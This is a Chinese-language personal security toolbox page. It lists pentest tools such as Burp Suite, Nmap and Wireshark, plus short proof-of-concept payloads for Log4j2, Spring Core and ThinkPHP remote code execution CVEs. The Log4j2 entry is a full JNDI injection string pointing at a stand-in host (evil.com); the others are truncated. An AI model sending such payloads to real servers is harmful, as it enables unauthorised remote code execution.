跳到主要内容

工具箱

fish の 妙妙工具箱

安全工具

点击查看更多
Burp Suite

Burp Suite

Web应用程序安全测试平台

渗透测试抓包
Yakit

Yakit

集成化网络安全评估平台

渗透测试集成平台
Kali Linux

Kali Linux

渗透测试和安全审计的专用Linux发行版

渗透测试Linux
Proxifier

Proxifier

允许不支持代理的程序通过代理联网

代理抓包
Wireshark

Wireshark

网络协议分析器

抓包分析
Nmap

Nmap

网络扫描和主机发现工具

扫描端口

漏洞POC

点击查看更多

Log4j2 JNDI注入

CVE-2021-44228

Apache Log4j2 存在JNDI注入漏洞,可导致远程代码执行

Payload
${jndi:ldap://evil.com/a}
RCEJNDIJava
仓库 →

Spring Core RCE

CVE-2022-22965

Spring Framework 远程代码执行漏洞

Payload
class.module.getClassLoader().addUrl...
RCESpringJava
仓库 →

ThinkPHP RCE

CVE-2018-20062

ThinkPHP 远程代码执行漏洞

Payload
?s=index/think\app/invokefunction&function=call_user_func_array...
RCEPHP
仓库 →

报告工具

Doc-gen

Doc-gen

自动化报告生成工具

Python自动化
Report Builder

Report Builder

渗透测试报告生成器

Python报告